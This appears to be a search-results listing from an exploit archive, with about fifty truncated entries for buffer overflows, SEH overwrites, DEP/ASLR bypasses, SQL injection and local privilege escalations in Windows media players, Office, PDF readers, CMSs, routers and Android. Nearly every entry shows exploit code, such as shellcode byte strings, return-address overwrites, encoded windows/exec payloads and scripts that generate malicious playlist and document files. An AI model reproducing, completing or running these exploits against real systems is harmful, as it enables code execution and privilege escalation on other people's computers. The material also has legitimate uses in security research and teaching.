41207 matches found
Realtek-Audio-Control-Panel-1.0.1.65
The app has a classic buffer overflow vulnerability; it can be triggered by passing an overly long argument as a startup parameter. Shellcode can be run via a classic return-address overwrite or an SEH handler overwrite. filepath = "C:\ShellCode\RTLCPL 1.1.1.6 - Exploit.bin" f = open(filepath, "wb") f.write('BraniX'...
Foxit-Reader-4.1.1
Exploit Title : Foxit 4.1.1 Date : 13/11/2010 Author : Sud0 Bug found by : dookie Original POC : https://www.exploit-db.com/exploits/15514/ Software Link : http://www.foxitsoftware.com/downloads/index.php header ="\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xE2\xE3\xCF\xD3\x0D" header...
Free-WMA-MP3-Converter-1.1
Free WMA MP3 Converter 1.1 Buffer Overflow Exploit SEH Coded By: DrIDE Date: November 10, 2010 Download: http://www.eusing.com/freewmaconverter/mp3wmaconverter.htm Tested on: Windows XPSP3 code= "\x80\x87\x78\x68\x80\x87\x78\x68\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59"...
Mp3-Nator-2.0-SEH
Exploit Title: Exploit Buffer Overflow MP3-Nator Date: 10\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com...
Free-CD-to-MP3-Converter-3.1
Exploit Title: Free CD to MP3 Converter 3.1 Buffer Overflow Exploit SEH Date: 10/18/10 Credit/Bug found by: C4SS!0 G0M3S Software Link: http://www.eusing.com/Download/cdtomp3freeware.exe filename = 'crash.wav' windows/exec - 144 bytes http://www.metasploit.com Encoder: x86/shikata_ga_nai...
Sefrengo CMS 1.6.0 - SQL Injection
Sefrengo CMS 1.6.0 - SQL Injection Advisory: SQL-Injection in administrative Backend of Sefrengo CMS v.1.6.0 Advisory ID: SROEADV-2015-04 Author: Steffen Rösemann Affected Software: CMS Sefrengo v.1.6.0 Release-Date: 18th-Feb-2014 Vendor URL: http://www.sefrengo.org/start/start.html Vendor Status...
Microweber CMS 0.95 - SQL Injection
Microweber CMS 0.95 - SQL Injection Exploit Title: SQL Injection in Microweber CMS 0.95 Google Dork: N/A Date: 12/16/2014 Exploit Author: Pham Kien Cuong [email protected] and ITAS Team www.itas.vn Vendor Homepage: Microweber https://microweber.com/ Software Link:...
Pirelli ADSL22+ Wireless Router P.DGA4001N - Information Disclosure
Pirelli ADSL22+ Wireless Router P.DGA4001N - Information Disclosure - Title: CVE-2015-0554 ADB BroadBand Pirelli ADSL2/2+ Wireless Router P.DGA4001N remote information disclosure HomeStation Movistar - Author: Eduardo Novella @enovella [email protected] - Version: Tested on firmware version...
Nexus 5 Android 5.0 - Local Privilege Escalation
Nexus 5 Android 5.0 - Local Privilege Escalation / CVE-2014-4322 exploit for Nexus Android 5.0 author: retme [email protected] website: retme.net The exploit must be executed with system privilege and a specific SELinux context. If the exploit succeeds, you will gain root privilege and the "kernel" SELinux...
AdaptCMS 3.0.3 - Multiple Vulnerabilities
AdaptCMS 3.0.3 - Multiple Vulnerabilities #!/usr/bin/env python AdaptCMS 3.0.3 Remote Command Execution Exploit Vendor: Insane Visions Product web page: http://www.adaptcms.com Affected version: 3.0.3 Summary: AdaptCMS is a Content Management System trying to be both simple and easy to use, as wel...
VideoSpirit-Pro-1.68
"VideoSpirit Pro is the most easily used Video Converter/Editor tools. For acting as a Video Editor, various slide effect/title/subtitle can be added to a video clip. Also, the video clip can be rotated, resized and warped. Multiple video/audio clips can be joined together. Converting speed is fa...
BS.Player-2.57-SEH
Exploit Title: Exploit Buffer Overflow Bsplayer 2.57 UNICODE-SEH Date: 01\07\2010 Author: C4SS!0 G0M3S Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 import os import sys import time import string os.system("cls") os.system("color 4f") def usage(): if len(sys.argv)!=3 or...
Music-Animation-Machine-MIDI-Player-SEH
Exploit Title: Music Animation Machine MIDI Player MAMX SEH BOF Date 1/4/2011 Author: Acidgen mailto:spama t hgrayhat.se Software Link: http://www.musanim.com/player/MAMPlayer2006aug19035.zip Version: 2006aug19 Release 035 junk='\x41'*112 seh='\xeb\x06\x90\x90' pad='\x90'*10 junk2='\x42'*9496 Sor...
CoolPlayer-2.18-DEP-Bypass
Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not work on all Win XP SP3 machines windows/exec calc.exe 227 bytes - 240 bytes of shellcode space available shellcode =...
Digital-Music-Pad-8.2.3.4.8-(.pls)
Digital Music Pad Version 8.2.3.4.8 SEH overflow Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Vulnerable version DJ Studio Pro Version 8.2.3.4.8 filename = "POC.pls" windows/exec -...
MP3-CD-Converter-Professional-BoF-(SEH)
Exploit Title: Exploit Buffer Overflow MP3 CD Converter Professional SEH Date: 12/20/2010 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe Version: 5.0.3 import os import sys import struct import time def usage(): os.system("cls") os.system("color 4f") print("\n")...
Aesop-GIF-Creator-2.1
Aesop is a powerful tool that allows you to create animated GIF images banners, buttons, labels and headings for your website and even GIF wallpapers for your mobile phone quickly and easily click to see samples. You can use an antialiased 3D-Text, shapes rectangles, rounded rectangles, ellipses...
xRadio-0.95b-(.xrl)
xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger...
AOL-Desktop-9.6-(.rtx)
NOTE: If exploit doesn't work turn AOL off CTRL+ALT+DELETE and turn all AOL processes off then try again Watch out for other bad chars !! Current bad chars: \x00\x0a\x0d\x20\x31\x90\x3e First Header hd1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a"...
AOL-9.5-(rtx)-Local-Buffer-Overflow
Bug : AOL 9.5 rtx Local Buffer Overflow Exploit by sup3r Tested on : XP SP3 header1 = "\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22"...
NetZip-Classic-SEH
Exploit Title: Exploit Buffer Overflow NetZip Classic SEH Date: 01\30\2011 Author: C4SS!0 G0M3S Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html Version: 7.5.1.86 Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN def usage; system("cls"); system("color 4f"); end; if ARGV.length != 1; usage...
WM-Downloader-3.1.2.2-2010.04.15-(.m3u)
WM Downloader 3.1.2.2 2010.04.15 .m3u Buffer Overflow + DEP Bypass Author: sickness Download : http://mini-stream.net/wm-downloader/ The payload can be replaced with whatever you want, there is enough space. import sys header='EXTM3U\n' junk ='http://'+'\x90'*17400 junk+='\x41'*17 eip...
Virtuosa-Phoenix-Edition-5.2-ASX
Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite Date found: Aug 16th 2010 Author: Acidgen Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe Version: 5.2 junkA = '\x41'*1021 junkB = '\x42'*8979 nSEH = '\xeb\x06\xff\xff' SEH = '\x7e\xaa\x01\x10' nop = '\x90'*10...
Nokia-Multimedia-Player-1.0
Exploit Title: Nokia Multimedia player SEH Unicode Date: January 11 2011 Author: Carlos Mario Penagos Hollmann Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html Version: 1.00.55.5010 junk="\x44"*2660 shellcode =...
DVD-X-Player-5.5-Pro-SEH
DVD X Player 5.5 Pro Bypass ASLR by using non-aslr enabled module SEH Overwrite Egghunter is not needed as there is at least 2000 bytes for shellcode import sys print "====================================" print "DVD X Player 5.5 Pro Buffer Overflow" print " SEH Overwrite - Bypass ASLR " print "...
CoolPlayer-Portable-2.19.2-ASLR
Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake 233 bytes for shellcode available 227 byte windows/exec shellcode = CMD=calc.exe shellcode=...
Free-MP3-CD-Ripper-1.1-DEP
Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit Date: 27\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version: 1.1 from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...
Free-MP3-CD-Ripper-1.1
Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version : 1.1 Tested on : Windows xp sp3 en Date : 27/08/2011 Author : X-h4ck Website : http://www.pirate.al , http://theflashcrew.blogspot.com Email : [email protected]...
MP3-CD-Converter-Professional-5.3.0
Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit Date: 11\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe from struct import pack from time import sleep from sys import exit print ''' Created By C4SS!0 G0M3S E-mail...
BlazeVideo-HDTV-Player-multi
Take a look at mona.py, an awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ This is the old-fashioned bug; I just try to make it universal. It has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...
AVCon-DEP-Bypass
DEP Bypass for OptIn/OptOut all modules used are not aslr aware script produces a text file, copy the contents paste in the input field next to the call button discovered by Dillon Beresford import sys from struct import pack around 619 bytes of space before seh overwrite if more space is needed,...
MY-MP3-Player-3.0-m3u
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe - 1014 bytes of space for shellcode shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
Mini-Stream-Ripper-2.9.7-DEP
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
Wav-Player-1.1.3.6-(.pll)
Open the wav player, make a playlist and save it. Then close the player and run this exploit to create the new playlist. When you open the wav player again, you will see the calc. fichero = open("wvplayer.pll", "w") print "+ Creating exploit .pll..." fichero.write("A"*1034) Padding fichero.write"t%dA" he...
Microsoft-Office-2003-HomePro
Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 Authors: b33f Ruben Boonen g11tch Chris Hodges import binascii filename = "evil.doc" ----------------------------------------------------------------------------------- File Structure...
CCMPlayer-1.5-Stack-based
Exploit: CCMPlayer 1.5 Stack based Buffer Overflow SEH Exploit .m3u Date: 30 Nov 2011 Author: Rh0 Software: CCMPlayer 1.5 m3u = "C:\" shellcode m3u p/p/r m3u Songs - Add - Files of type: m3u - msf.m3u = exploit filecreatem3u...
GOM-Player-2.1.33.5071-ASX-File-Unicode
Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071 Date: 30-11-2011 Author: Debasish Mandal Peter Van Eeckhoutte corelanc0d3r raw_input(" Press Enter to generate the crafted ASX...") size = 2046 Shellcode WinExec "Calc.exe"...
Windows-XP-2003-Afd.sys-Escalation
MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit Author: [email protected] - Matteo Memelli HalDispatchTable+0x4+1 from ctypes import windll, CDLL, Structure, byref, sizeof, POINTER, c_char, c_short, c_ushort, c_int, c_uint, c_ulong, c_void_p, c_long, c_char_p from ctypes.wintypes import HANDLE...
Aviosoft-Digital-TV-Player-Professional-1.x
Exploit Title: Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow Author: modpr0be Software Download: http://www.aviosoft.com/download.php?product=dtvplayerpro Date: 08/11/2011 Tested on: Windows XP SP3, Windows 7 SP1 import struct file = 'adtvbof.plf' totalsize = 5000 junk = 'A' 8...
Office-2008-sp0-RTF-Pfragments
RTF Pfragments exploit for MAC office 2008 Advanced Hacking Trainings - http://training.aslitsecurity.com Web - http://www.aslitsecurity.com/ Blog - http://www.aslitsecurity.blogspot.com/ Office 2007 for MC SP 0 myfile = "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b"...
wicd-Local-Privilege-Escalation-Exploit
#!/usr/bin/python wicd 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student For full write up and description go to http://www.infosecinstitute.com/courses/ethicalhackingtraining.html import sys import os import time import getopt try: from wicd import dbusmanager except: print "!...
Mini-stream-RM-MP3-Converter-3.1.2.2
Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41"*17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90"*16 ShellCode =...
BlazeVideo-HDTV-Player-6.6-ASLR
Exploit: BlazeVideo HDTV Player 6.6 Professional SEH DEP ASLR Author: b33f - http://www.fuzzysecurity.com/ OS: Tested on Windows 7 32-bit PRO SP1 Software Link: http://www.blazevideo.com/download.htm Pro v6.6 - Apr 12, 2011 filename="blaze.plf"...
Bitsmith-PS-Knowbase-3.2.3
Personal Knowbase is a program for organizing free-form information using keywords. Build a personal knowledge base of all your notes, messages, and ideas. Store and index your information in one place for easy retrieval using keywords that you choose. The attachment feature even associates disk...
Blade-API-Monitor-Unicode-Bypass
This is a super strange exploit. First I would like to commend "FullMetalFouad" for the unicode work on the original exploit. Originally I wanted to see if I could simplify the process. While I was doing that I lost sight of the fact that the instructions had to be printable since we need to copy...
Sysax-5.62-Admin-Interface-
Title: Sysax 5.62 Admin Interface Local Buffer Overflow Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Date Discovered: June 15, 2012 Vendor Contacted: June 19, 2012 import socket,sys,time,re,base64,subprocess def main(): global login print "\n" print "" print " Sysax " not in fullpage: page ...
Adobe-Illustrator-CS5.5
ImageType AlphaChannelCount reserved bin-ascii ImageMask XI Arguments to the XI operator specify the location and size of the image, its pixel bit depth, color type, and other attributes The image matrix maps the unit square of user space, bounded by 0, 0 and 1, 1 in user space, to the boundary o...
Lattice-Semiconductor-PAC-Designer-6.21
Exploit: Lattice Semiconductor PAC-Designer 6.21 possibly all versions CVE: CVE-2012-2915 Author: b33f Ruben Boonen - http://www.fuzzysecurity.com/ OS: WinXP SP1 Software: http://www.latticesemi.com/products/designsoftware/pacdesigner/index.cfm filename="evil.PAC" PAC1 = """ 1 ispPAC-CLK5410D...
Novell-Client-4.91-SP4-Escalation
Author: [email protected] Version Tested: Novell Client 4.91 SP4 Targets: Exploit works on all service packs of Win2K3 and WinXP except Windows XP SP1 from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi =...
AnvSoft-Any-Video-Converter-4.3.6
Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow Author: cikumel @mhxx and y0k @riy0wid from @spentera research Website: http://www.spentera.com Platform: Windows import os,shutil,time,sys def banner(): print "\n\tAnvSoft Any Video Converter 4.3.6 Stack Overflow" print "\tbased on PO...